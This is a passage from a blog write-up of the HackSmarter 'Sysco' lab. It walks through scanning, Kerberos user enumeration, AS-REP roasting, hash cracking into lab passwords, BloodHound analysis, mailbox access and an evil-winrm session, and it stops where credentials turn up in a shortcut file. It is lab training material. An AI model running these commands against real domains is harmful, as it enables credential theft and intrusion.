<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="HackSmarter Sysco - Complete Penetration Testing WalkthroughIntroductionWelcome to this comprehensive penetration testing writeup for the Sysco machine from HackSmarter. This walkthrough demonstrates">
<meta property="og:type" content="article">
<meta property="og:title" content="HS-Sysco">
<meta property="og:url" content="https://panosoikogr.github.io/2025/10/31/HS-Sysco/index.html">
<meta property="og:site_name" content="Panosoiko Cybersecurity Blog">
<meta property="og:description" content="HackSmarter Sysco - Complete Penetration Testing WalkthroughIntroductionWelcome to this comprehensive penetration testing writeup for the Sysco machine from HackSmarter. This walkthrough demonstrates">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://panosoikogr.github.io/images/Sysco/potential-users.png">
<meta property="og:image" content="https://panosoikogr.github.io/images/Sysco/roundcube.png">
<meta property="og:image" content="https://panosoikogr.github.io/images/Sysco/valid-users.png">
<meta property="og:image" content="https://panosoikogr.github.io/images/Sysco/asreproast.png">
<meta property="og:image" content="https://panosoikogr.github.io/images/Sysco/shares_access.png">
<meta property="og:image" content="https://panosoikogr.github.io/images/Sysco/Clear-Path.png">
<meta property="og:image" content="https://panosoikogr.github.io/images/Sysco/mail-stuff.png">
<meta property="og:image" content="https://panosoikogr.github.io/images/Sysco/winrm-access.png">
<meta property="og:image" content="https://panosoikogr.github.io/images/Sysco/ezexploit.png">
<meta property="og:image" content="https://panosoikogr.github.io/images/Sysco/got-greg.png">
<meta property="og:image" content="https://panosoikogr.github.io/images/Sysco/gpupdate.png">
<meta property="article:published_time" content="2025-10-31T07:31:34.000Z">
<meta property="article:modified_time" content="2025-10-31T07:33:00.854Z">
<meta property="article:author" content="Panosoiko">
<meta property="article:tag" content="HackSmarter">
<meta property="article:tag" content="Windows">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://panosoikogr.github.io/images/Sysco/potential-users.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/android-chrome-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>HS-Sysco</title>
    <!-- async scripts -->
    <!-- Google Analytics -->

  <script async src="https://www.googletagmanager.com/gtag/js?id=G-73BMC8ZHB7"></script>
  <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());
      gtag('config', 'G-73BMC8ZHB7');
  </script>


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 8.0.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writeups</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/tags/">tags</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/PanosoikoGr">Projects</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2025/11/01/HS-BuildingMagic/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2025/10/29/HTB-Haze/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://panosoikogr.github.io/2025/10/31/HS-Sysco/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://panosoikogr.github.io/2025/10/31/HS-Sysco/&text=HS-Sysco"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://panosoikogr.github.io/2025/10/31/HS-Sysco/&title=HS-Sysco"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://panosoikogr.github.io/2025/10/31/HS-Sysco/&is_video=false&description=HS-Sysco"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=HS-Sysco&body=Check out this article: https://panosoikogr.github.io/2025/10/31/HS-Sysco/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://panosoikogr.github.io/2025/10/31/HS-Sysco/&title=HS-Sysco"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://panosoikogr.github.io/2025/10/31/HS-Sysco/&title=HS-Sysco"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://panosoikogr.github.io/2025/10/31/HS-Sysco/&title=HS-Sysco"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://panosoikogr.github.io/2025/10/31/HS-Sysco/&title=HS-Sysco"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://panosoikogr.github.io/2025/10/31/HS-Sysco/&name=HS-Sysco&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://panosoikogr.github.io/2025/10/31/HS-Sysco/&t=HS-Sysco"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#HackSmarter-Sysco-Complete-Penetration-Testing-Walkthrough"><span class="toc-number">1.</span> <span class="toc-text">HackSmarter Sysco - Complete Penetration Testing Walkthrough</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Introduction"><span class="toc-number">1.1.</span> <span class="toc-text">Introduction</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Initial-Reconnaissance"><span class="toc-number">1.2.</span> <span class="toc-text">Initial Reconnaissance</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Nmap-Scan-Results"><span class="toc-number">1.2.1.</span> <span class="toc-text">Nmap Scan Results</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#UDP-Scan-Results"><span class="toc-number">1.2.2.</span> <span class="toc-text">UDP Scan Results</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Hosts-File-Configuration"><span class="toc-number">1.2.3.</span> <span class="toc-text">Hosts File Configuration</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web-Enumeration"><span class="toc-number">1.3.</span> <span class="toc-text">Web Enumeration</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#HTTP-Service-Analysis"><span class="toc-number">1.3.1.</span> <span class="toc-text">HTTP Service Analysis</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Directory-Fuzzing"><span class="toc-number">1.3.2.</span> <span class="toc-text">Directory Fuzzing</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Active-Directory-Enumeration"><span class="toc-number">1.4.</span> <span class="toc-text">Active Directory Enumeration</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#SMB-Enumeration"><span class="toc-number">1.4.1.</span> <span class="toc-text">SMB Enumeration</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#User-Validation-with-Kerbrute"><span class="toc-number">1.4.2.</span> <span class="toc-text">User Validation with Kerbrute</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Initial-Access-AS-REP-Roasting"><span class="toc-number">1.5.</span> <span class="toc-text">Initial Access - AS-REP Roasting</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#AS-REP-Roasting-Attack"><span class="toc-number">1.5.1.</span> <span class="toc-text">AS-REP Roasting Attack</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Hash-Cracking"><span class="toc-number">1.5.2.</span> <span class="toc-text">Hash Cracking</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Share-Access-Verification"><span class="toc-number">1.5.3.</span> <span class="toc-text">Share Access Verification</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Bloodhound-Analysis"><span class="toc-number">1.6.</span> <span class="toc-text">Bloodhound Analysis</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Data-Collection"><span class="toc-number">1.6.1.</span> <span class="toc-text">Data Collection</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Attack-Path-Analysis"><span class="toc-number">1.6.2.</span> <span class="toc-text">Attack Path Analysis</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Email-Enumeration"><span class="toc-number">1.7.</span> <span class="toc-text">Email Enumeration</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Roundcube-Access"><span class="toc-number">1.7.1.</span> <span class="toc-text">Roundcube Access</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Email-Investigation"><span class="toc-number">1.7.2.</span> <span class="toc-text">Email Investigation</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Hash-Cracking-Round-2"><span class="toc-number">1.7.3.</span> <span class="toc-text">Hash Cracking Round 2</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Credential-Validation"><span class="toc-number">1.7.4.</span> <span class="toc-text">Credential Validation</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Lateral-Movement"><span class="toc-number">1.8.</span> <span class="toc-text">Lateral Movement</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#WinRM-Session"><span class="toc-number">1.8.1.</span> <span class="toc-text">WinRM Session</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Credential-Discovery"><span class="toc-number">1.8.2.</span> <span class="toc-text">Credential Discovery</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Credential-Spraying"><span class="toc-number">1.8.3.</span> <span class="toc-text">Credential Spraying</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Privilege-Escalation-via-GPO-Abuse"><span class="toc-number">1.9.</span> <span class="toc-text">Privilege Escalation via GPO Abuse</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#GPO-Abuse-Strategy"><span class="toc-number">1.9.1.</span> <span class="toc-text">GPO Abuse Strategy</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Adding-Administrative-User"><span class="toc-number">1.9.2.</span> <span class="toc-text">Adding Administrative User</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Group-Policy-Update"><span class="toc-number">1.9.3.</span> <span class="toc-text">Group Policy Update</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Domain-Compromise"><span class="toc-number">1.10.</span> <span class="toc-text">Domain Compromise</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Administrative-Access"><span class="toc-number">1.10.1.</span> <span class="toc-text">Administrative Access</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Conclusion"><span class="toc-number">1.11.</span> <span class="toc-text">Conclusion</span></a></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        HS-Sysco
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Panosoiko</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-10-31T07:31:34.000Z" class="dt-published" itemprop="datePublished">2025-10-31</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/HackSmarter/" rel="tag">HackSmarter</a>, <a class="p-category" href="/tags/Windows/" rel="tag">Windows</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h1 id="HackSmarter-Sysco-Complete-Penetration-Testing-Walkthrough"><a href="#HackSmarter-Sysco-Complete-Penetration-Testing-Walkthrough" class="headerlink" title="HackSmarter Sysco - Complete Penetration Testing Walkthrough"></a>HackSmarter Sysco - Complete Penetration Testing Walkthrough</h1><h2 id="Introduction"><a href="#Introduction" class="headerlink" title="Introduction"></a>Introduction</h2><p>Welcome to this comprehensive penetration testing writeup for the <strong>Sysco</strong> machine from <strong>HackSmarter</strong>. This walkthrough demonstrates a full Active Directory exploitation chain, from initial reconnaissance to domain compromise. Throughout this engagement, I utilized various tools including <strong>Nmap</strong>, <strong>Kerbrute</strong>, <strong>Netexec</strong>, <strong>Hashcat</strong>, <strong>Evil-WinRM</strong>, and <strong>pyGPOAbuse</strong> to successfully compromise the target domain.</p>
<p>This writeup will guide you through each step of the penetration test, including service enumeration, user discovery, AS-REP roasting, credential spraying, email enumeration, privilege escalation via Group Policy Objects (GPO), and ultimately achieving Domain Administrator access.</p>
<hr>
<h2 id="Initial-Reconnaissance"><a href="#Initial-Reconnaissance" class="headerlink" title="Initial Reconnaissance"></a>Initial Reconnaissance</h2><h3 id="Nmap-Scan-Results"><a href="#Nmap-Scan-Results" class="headerlink" title="Nmap Scan Results"></a>Nmap Scan Results</h3><p>Starting with a comprehensive port scan to identify running services:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">PORT      STATE SERVICE       REASON          VERSION</span><br><span class="line">53/tcp    open  domain        syn-ack ttl 126 Simple DNS Plus</span><br><span class="line">80/tcp    open  http          syn-ack ttl 126 Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.2.12)</span><br><span class="line">|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12</span><br><span class="line">| http-methods: </span><br><span class="line">|   Supported Methods: POST OPTIONS HEAD GET TRACE</span><br><span class="line">|_  Potentially risky methods: TRACE</span><br><span class="line">|_http-favicon: Unknown favicon MD5: DD229045B1B32B2F2407609235A23238</span><br><span class="line">|_http-title: Index - Sysco MSP</span><br><span class="line">135/tcp   open  msrpc         syn-ack ttl 126 Microsoft Windows RPC</span><br><span class="line">139/tcp   open  netbios-ssn   syn-ack ttl 126 Microsoft Windows</span><br><span class="line">389/tcp   open  ldap          syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: SYSCO.LOCAL0., Site: Default-First-Site-Name)</span><br><span class="line">445/tcp   open  microsoft-ds? syn-ack ttl 126</span><br><span class="line">464/tcp   open  kpasswd5?     syn-ack ttl 126</span><br><span class="line">593/tcp   open  ncacn_http    syn-ack ttl 126 Microsoft Windows RPC</span><br><span class="line">636/tcp   open  tcpwrapped    syn-ack ttl 126</span><br><span class="line">3268/tcp  open  ldap          syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: SYSCO.LOCAL0., Site: Default-First-Site-Name)</span><br><span class="line">3269/tcp  open  tcpwrapped    syn-ack ttl 126</span><br><span class="line">3389/tcp  open  ms-wbt-server syn-ack ttl 126 Microsoft Terminal</span><br><span class="line">| rdp-ntlm-info: </span><br><span class="line">|   Target_Name: SYSCO</span><br><span class="line">|   NetBIOS_Domain_Name: SYSCO</span><br><span class="line">|   NetBIOS_Computer_Name: DC01</span><br><span class="line">|   DNS_Domain_Name: SYSCO.LOCAL</span><br><span class="line">|   DNS_Computer_Name: DC01.SYSCO.LOCAL</span><br><span class="line">|   Product_Version: 10.0.20348</span><br><span class="line">|_  System_Time: 2025-10-31T06:20:07+00:00</span><br><span class="line">|_ssl-date: 2025-10-31T06:20:46+00:00; -1s from scanner time.</span><br><span class="line">9389/tcp  open  mc-nmf        syn-ack ttl 126 .NET Message Framing</span><br><span class="line">49664/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC</span><br><span class="line">49681/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC</span><br><span class="line">49743/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC</span><br><span class="line">49816/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC</span><br></pre></td></tr></table></figure>

<p>The scan reveals this is a Windows Domain Controller running Active Directory services. Key observations include:</p>
<ul>
<li><strong>DNS (Port 53)</strong> - Domain Name Service</li>
<li><strong>HTTP (Port 80)</strong> - Web server running Apache</li>
<li><strong>LDAP (Ports 389, 3268)</strong> - Active Directory services</li>
<li><strong>SMB (Port 445)</strong> - File sharing</li>
<li><strong>RDP (Port 3389)</strong> - Remote Desktop access</li>
<li><strong>Domain</strong>: SYSCO.LOCAL</li>
<li><strong>Computer Name</strong>: DC01</li>
</ul>
<h3 id="UDP-Scan-Results"><a href="#UDP-Scan-Results" class="headerlink" title="UDP Scan Results"></a>UDP Scan Results</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">panosoiko@parrot:~$ udpx -t 10.1.76.162        </span><br><span class="line"></span><br><span class="line">        __  ______  ____ _  __</span><br><span class="line">       / / / / __ \/ __ \ |/ /</span><br><span class="line">      / / / / / / / /_/ /   / </span><br><span class="line">     / /_/ / /_/ / ____/   |  </span><br><span class="line">     \____/_____/_/   /_/|_|  </span><br><span class="line">         v1.0.7, by @nullt3r</span><br><span class="line"></span><br><span class="line">2025/10/31 08:21:00 [+] Starting UDP scan on 1 target(s)</span><br><span class="line">2025/10/31 08:21:04 [*] 10.1.76.162:53 (dns)</span><br><span class="line">2025/10/31 08:21:08 [*] 10.1.76.162:123 (ntp)</span><br><span class="line">2025/10/31 08:21:17 [*] 10.1.76.162:88 (kerberos)</span><br><span class="line">2025/10/31 08:21:30 [+] Scan completed</span><br></pre></td></tr></table></figure>

<p>The UDP scan confirms Kerberos (port 88) and NTP services are running.</p>
<h3 id="Hosts-File-Configuration"><a href="#Hosts-File-Configuration" class="headerlink" title="Hosts File Configuration"></a>Hosts File Configuration</h3><p>Before proceeding, we need to add the domain and DC to our hosts file:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo nano /etc/hosts</span><br></pre></td></tr></table></figure>

<p>Add the following entry:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">10.1.76.162    dc01.sysco.local sysco.local</span><br></pre></td></tr></table></figure>

<hr>
<h2 id="Web-Enumeration"><a href="#Web-Enumeration" class="headerlink" title="Web Enumeration"></a>Web Enumeration</h2><h3 id="HTTP-Service-Analysis"><a href="#HTTP-Service-Analysis" class="headerlink" title="HTTP Service Analysis"></a>HTTP Service Analysis</h3><p>The web server on port 80 hosts a generic corporate website for Sysco MSP. During enumeration, I discovered valuable information about potential usernames:</p>
<p><img src="/images/Sysco/potential-users.png" alt="Potential Users Found on Website"></p>
<p><strong>Discovered potential usernames:</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Greg.Shields</span><br><span class="line">Sarah.Jhonson</span><br><span class="line">Jack.Dowland</span><br><span class="line">Lainey.Moore</span><br></pre></td></tr></table></figure>

<h3 id="Directory-Fuzzing"><a href="#Directory-Fuzzing" class="headerlink" title="Directory Fuzzing"></a>Directory Fuzzing</h3><p>Running Feroxbuster to discover hidden directories:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">feroxbuster -u http://10.1.76.162/</span><br></pre></td></tr></table></figure>

<p>The scan revealed a <strong>Roundcube</strong> webmail portal - an excellent target for credential-based attacks once we obtain valid credentials.</p>
<p><img src="/images/Sysco/roundcube.png" alt="Roundcube Portal Discovery"></p>
<hr>
<h2 id="Active-Directory-Enumeration"><a href="#Active-Directory-Enumeration" class="headerlink" title="Active Directory Enumeration"></a>Active Directory Enumeration</h2><h3 id="SMB-Enumeration"><a href="#SMB-Enumeration" class="headerlink" title="SMB Enumeration"></a>SMB Enumeration</h3><p>Initial SMB enumeration revealed:</p>
<ul>
<li>Null authentication is allowed</li>
<li>Cannot bruteforce RID</li>
<li>Cannot enumerate shares without credentials</li>
<li>Guest account is disabled</li>
</ul>
<h3 id="User-Validation-with-Kerbrute"><a href="#User-Validation-with-Kerbrute" class="headerlink" title="User Validation with Kerbrute"></a>User Validation with Kerbrute</h3><p>Using Kerbrute to validate the usernames discovered from the website:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kerbrute userenum -d sysco.local --dc dc01.sysco.local usernames.txt</span><br></pre></td></tr></table></figure>

<p><img src="/images/Sysco/valid-users.png" alt="Valid Users Confirmed"></p>
<p><strong>Three valid accounts confirmed:</strong></p>
<ul>
<li>Greg.Shields</li>
<li>Jack.Dowland</li>
<li>Lainey.Moore</li>
</ul>
<hr>
<h2 id="Initial-Access-AS-REP-Roasting"><a href="#Initial-Access-AS-REP-Roasting" class="headerlink" title="Initial Access - AS-REP Roasting"></a>Initial Access - AS-REP Roasting</h2><h3 id="AS-REP-Roasting-Attack"><a href="#AS-REP-Roasting-Attack" class="headerlink" title="AS-REP Roasting Attack"></a>AS-REP Roasting Attack</h3><p>After attempting password spraying with usernames as passwords (unsuccessful), I proceeded with AS-REP roasting to identify accounts that don’t require Kerberos pre-authentication:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nxc ldap dc01.sysco.local -u names -p &#x27;&#x27; --asreproast output.txt</span><br></pre></td></tr></table></figure>

<p><img src="/images/Sysco/asreproast.png" alt="AS-REP Roasting Success"></p>
<p><strong>Success!</strong> We obtained a Kerberos AS-REP hash for <strong>Jack.Dowland</strong>.</p>
<h3 id="Hash-Cracking"><a href="#Hash-Cracking" class="headerlink" title="Hash Cracking"></a>Hash Cracking</h3><p>Saving the hash to a file and cracking it with Hashcat:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hashcat hash /usr/share/wordlists/rockyou.txt</span><br></pre></td></tr></table></figure>

<p>Hashcat automatically detected the hash type (AS-REP). If manual mode selection is needed, use <code>-m 18200</code>.</p>
<p><strong>Cracked credentials:</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Jack.Dowland:musicman1</span><br></pre></td></tr></table></figure>

<h3 id="Share-Access-Verification"><a href="#Share-Access-Verification" class="headerlink" title="Share Access Verification"></a>Share Access Verification</h3><p>Testing the credentials against SMB shares:</p>
<p><img src="/images/Sysco/shares_access.png" alt="SMB Share Access"></p>
<p>The credentials provide access to various shares, confirming their validity.</p>
<hr>
<h2 id="Bloodhound-Analysis"><a href="#Bloodhound-Analysis" class="headerlink" title="Bloodhound Analysis"></a>Bloodhound Analysis</h2><h3 id="Data-Collection"><a href="#Data-Collection" class="headerlink" title="Data Collection"></a>Data Collection</h3><p>Using Netexec to collect Bloodhound data:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netexec ldap dc01.sysco.local -u Jack.Dowland -p musicman1 --bloodhound --dns-server 10.1.76.162 -c ALL --dns-tcp</span><br></pre></td></tr></table></figure>

<h3 id="Attack-Path-Analysis"><a href="#Attack-Path-Analysis" class="headerlink" title="Attack Path Analysis"></a>Attack Path Analysis</h3><p><img src="/images/Sysco/Clear-Path.png" alt="Clear Privilege Escalation Path"></p>
<p><strong>Key findings:</strong></p>
<ul>
<li>Jack.Dowland has no direct privilege escalation paths</li>
<li><strong>Greg.Shields</strong> shows excellent potential as our next target</li>
<li>Greg.Shields has <strong>GenericAll</strong> permissions over the <strong>DEFAULT DOMAIN POLICY</strong></li>
</ul>
<p>This GenericAll permission is critical - it allows us to modify Group Policy Objects (GPO), which can lead to domain compromise.</p>
<hr>
<h2 id="Email-Enumeration"><a href="#Email-Enumeration" class="headerlink" title="Email Enumeration"></a>Email Enumeration</h2><h3 id="Roundcube-Access"><a href="#Roundcube-Access" class="headerlink" title="Roundcube Access"></a>Roundcube Access</h3><p>Testing Jack.Dowland’s credentials on the Roundcube portal - <strong>successful login!</strong></p>
<h3 id="Email-Investigation"><a href="#Email-Investigation" class="headerlink" title="Email Investigation"></a>Email Investigation</h3><p><img src="/images/Sysco/mail-stuff.png" alt="Email Discovery"></p>
<p>While reviewing Jack’s emails, I discovered a message sent to Lainey.Moore regarding a router configuration. The email contained a <strong>password hash</strong>.</p>
<h3 id="Hash-Cracking-Round-2"><a href="#Hash-Cracking-Round-2" class="headerlink" title="Hash Cracking Round 2"></a>Hash Cracking Round 2</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hashcat hash /usr/share/wordlists/rockyou.txt</span><br></pre></td></tr></table></figure>

<p>The hash cracked to: <strong>Chocolate1</strong></p>
<h3 id="Credential-Validation"><a href="#Credential-Validation" class="headerlink" title="Credential Validation"></a>Credential Validation</h3><p>First, attempting to use the password for Lainey.Moore:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netexec smb dc01.sysco.local -u lainey.moore -p Chocolate1 --shares</span><br></pre></td></tr></table></figure>

<p><img src="/images/Sysco/winrm-access.png" alt="WinRM Access Achieved"></p>
<p><strong>Success!</strong> Lainey.Moore is a member of the <strong>Remote Desktop Users</strong> group, granting us WinRM access.</p>
<hr>
<h2 id="Lateral-Movement"><a href="#Lateral-Movement" class="headerlink" title="Lateral Movement"></a>Lateral Movement</h2><h3 id="WinRM-Session"><a href="#WinRM-Session" class="headerlink" title="WinRM Session"></a>WinRM Session</h3><p>Establishing a WinRM session as Lainey.Moore:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">evil-winrm -i dc01.sysco.local -u lainey.moore -p Chocolate1</span><br></pre></td></tr></table></figure>

<h3 id="Credential-Discovery"><a href="#Credential-Discovery" class="headerlink" title="Credential Discovery"></a>Credential Discovery</h3><p><img src="/images/Sysco/ezexploit.png" alt="Cleartext Password in LNK File"></p>
<p>While enumerating the file system, I discovered a <strong>.lnk file</strong> containing cleartext credentials:</p>
